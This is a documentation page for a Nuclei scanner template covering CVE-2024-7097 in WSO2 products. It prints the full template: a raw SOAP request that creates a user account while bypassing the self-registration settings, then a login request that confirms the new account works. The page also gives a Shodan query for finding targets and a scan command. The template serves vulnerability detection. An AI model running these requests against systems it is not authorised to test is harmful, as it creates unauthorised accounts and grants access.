Skip to content
Nuclei Templates

WSO2 User Registration - Arbitrary Account Creation

ID: CVE-2024-7097

Severity: medium

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,wso2,intrusive,auth-bypass

Description

Section titled “Description”

The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.

YAML Source

Section titled “YAML Source”
id: CVE-2024-7097


info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass


variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"


flow: http(1) && http(2)


http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml


        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://org.apache.axis2/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <xsd:addUser>
        <xsd:user>
                 <xsd:userName>{{username}}</xsd:userName>
                 <xsd:password>{{password}}</xsd:password>
        </xsd:user>
              </xsd:addUser>
           </soapenv:Body>
        </soapenv:Envelope>


    matchers:
      - type: status
        status:
          - 202
        internal: true


  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml


        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
           <soapenv:Header/>
           <soapenv:Body>
              <aut:login>
                 <aut:username>{{username}}</aut:username>
                 <aut:password>{{password}}</aut:password>
              </aut:login>
           </soapenv:Body>
        </soapenv:Envelope>


    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 4a0a00473045022100a329adb144a01bd414cbf48754c7aec71dbb4db306c5a4f4a544616bab1f414402201aae5ae006320958b435bd6f02e62eb5bc3ecc3881411b2c6a9817fd0d5ed10a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-7097.yaml"

View on Github